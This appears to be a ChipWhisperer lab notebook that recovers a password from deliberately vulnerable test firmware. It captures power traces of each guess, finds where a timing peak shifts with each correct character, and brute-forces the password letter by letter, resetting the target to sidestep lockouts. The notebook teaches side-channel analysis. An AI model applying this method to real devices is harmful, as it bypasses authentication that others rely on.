# Attack Password with Timing Analysis (Attack)

In [ ]:
%run '../helper_scripts/Metadata.ipynb'
print_metadata()

<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Basic-Setup" data-toc-modified-id="Basic-Setup-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Basic Setup</a></span></li><li><span><a href="#Helper-Functions-for-Password-Attack" data-toc-modified-id="Helper-Functions-for-Password-Attack-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Helper Functions for Password Attack</a></span></li><li><span><a href="#Timing-Analysis" data-toc-modified-id="Timing-Analysis-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Timing Analysis</a></span></li><li><span><a href="#Trace-a-Password-attempt" data-toc-modified-id="Trace-a-Password-attempt-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Trace a Password attempt</a></span></li><li><span><a href="#Comparing-multiple-attempts" data-toc-modified-id="Comparing-multiple-attempts-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>Comparing multiple attempts</a></span></li><li><span><a href="#Attacking-a-Single-Letter" data-toc-modified-id="Attacking-a-Single-Letter-6"><span class="toc-item-num">6&nbsp;&nbsp;</span>Attacking a Single Letter</a></span></li><li><span><a href="#Attacking-the-Full-Password" data-toc-modified-id="Attacking-the-Full-Password-7"><span class="toc-item-num">7&nbsp;&nbsp;</span>Attacking the Full Password</a></span></li><li><span><a href="#Tests" data-toc-modified-id="Tests-8"><span class="toc-item-num">8&nbsp;&nbsp;</span>Tests</a></span></li><li><span><a href="#Disconnect" data-toc-modified-id="Disconnect-9"><span class="toc-item-num">9&nbsp;&nbsp;</span>Disconnect</a></span></li></ul></div>

## Basic Setup

Define Variables

In [ ]:
%run "Init.ipynb"

Build target and upload

In [ ]:
TARGET = 'basic-passwdcheck'
%store TARGET
%run "Passwordcheck_Prepare.ipynb"

Import helper functions

In [ ]:
%run "../helper_scripts/Setup_Generic.ipynb"

Setup is the same as usual, except this time we'll be capturing 2000 traces.

In [ ]:
scope.adc.samples = 2000

## Helper Functions for Password Attack

As was mentioned at the beginning of the tutorial, the firmware we loaded onto the target implements a basic password check. After getting a `'\n'` terminated password, the target checks it and enters an infinite loop, so before communicating with it, we'll need to reset it.

We'll be doing this a lot, so we'll define a function that resets the target (this function is also available by running "Helper_Scripts/Setup.ipynb" as we did above):

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool

output_notebook()

In [ ]:
def cap_pass_trace(pass_guess, fPrint = False):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    if fPrint == True:
        print(ret)
    
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ""
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

**NOTE**
The text may appear cutoff, accompanied by a message about data loss. This means that the buffer used to store serial data (128 bytes) from the target is full. This isn't an issue here, since the text is just aesthetic, but keep this in mind if you want to do large transfers of serial data using ChipWhisperer. 

## Timing Analysis

## Trace a Password attempt
It is easy to trace a single password attempt.

In [ ]:
outputbuf = ""
trace, outputbuf = cap_pass_trace("a\n", True)
x_range = range(0, len(trace))
p = figure()
p.add_tools(CrosshairTool())
p.line(x_range, trace)
show(p)

## Comparing multiple attempts
Now let's trace multiple password attempts where we use different parts of the "real" password which can be found in `./basic-passwordcheck.c`. 

In [ ]:
partly_password_traces = []
for attempt in ('a', 'i', 'ifa'):
    trace, _ = cap_pass_trace(attempt + '\n', False)
    partly_password_traces.append(trace)
p = figure()
p.add_tools(CrosshairTool())
for i, trace in enumerate(partly_password_traces):
    p.line(range(len(trace)), trace + i * 0.6)
show(p)

We can see that the traces look a bit different and the last peek downwards is moving to the right the more characters of the password are right. We can even see this more clearly if we modify the view a bit:

In [ ]:
import numpy
p = figure()
p.add_tools(CrosshairTool())
for i, trace in enumerate(partly_password_traces):
    p.line(range(500), numpy.array([t if t > 0.4 else 0.5 * t for t in abs(trace)[:500]]) + i * 0.5)
show(p)

Now it is easy to see that the peak at 289 moves with an increment of 40 to the right with each right character.

It is possible that the exact values vary in your setup.

## Attacking a Single Letter

The plan for the attack is simple: keep guessing letters until we no longer see the distinctive spike in the original location. To do this, we'll create a loop that:

* Figures out our next guess
* Does the capture and records the trace
* Checks if sample 289 is larger than -0.3 (replace with appropriate values)


In [ ]:
def checkpass(trace, i):
    return trace[137 + 40 * i] > -0.4

The below loop finds the first correct character, prints it, then ends. You should see "Success: I" after a while.

In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ''
outputbuf = ''
for c in trylist:
    next_pass = password + c + "\n"
    trace, outputbuf = cap_pass_trace(next_pass)
    if checkpass(trace, 0):
        print("Success: " + c)
        break

## Attacking the Full Password

Now that we can guess a single character, attacking the rest is easy; we just need to repeat the process in another loop, move the check point (this is the change is location you recorded earlier), and update our guess with the new correct letter.


In [ ]:
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
outputbuf = ""
for i in range(7):
    for c in trylist:
        next_pass = password + c + "\n"
        trace, outputbuf = cap_pass_trace(next_pass)
        if checkpass(trace, i):
            password += c
            print("Success {}, pass now {}".format(i, password))
            break

That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:

* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.

## Tests

In [ ]:
outputbuf = ""
trace, outputbuf = cap_pass_trace(password + '\n', True)
print (outputbuf)
if "Welcome" not in outputbuf:
    print("Failed to break password, got {}.\n".format(password))


## Disconnect

In [ ]:
scope.dis()
target.dis()